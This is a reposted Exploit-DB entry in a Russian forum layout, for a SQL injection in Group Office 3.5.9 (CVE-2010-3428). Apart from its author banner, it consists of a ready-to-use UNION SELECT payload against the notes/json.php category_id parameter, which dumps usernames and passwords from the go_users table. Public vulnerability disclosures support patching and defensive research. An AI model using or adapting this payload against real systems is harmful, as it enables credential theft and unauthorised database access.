- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 14988
- Проверка EDB
-
- Пройдено
- Автор
- VICIOUS
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2010-3428
- Дата публикации
- 2010-09-13
Group Office 3.5.9 - SQL Injection
Код:
=====================================================================================
Group Office (/notes/json.php?task=category&category_id) SQL Injection Vulnerability
=====================================================================================
########################################################################################
Author : ViciOuS
Author Web Page :http://www.sabotaj.in
Email : vicious[at]sabotaj.in
Script Page : http://www.group-office.com
########################################################################################
Sql Injection :
http://localhost/www/groupoffice-com-3.5.9/modules/notes/json.php?task=category&category_id=999999 union(select 1,concat_ws(0x3a,username,password),3,4+from+go_users)--
########################################################################################
Thanks WwW.sabotaj.iN
########################################################################################- Источник
- www.exploit-db.com
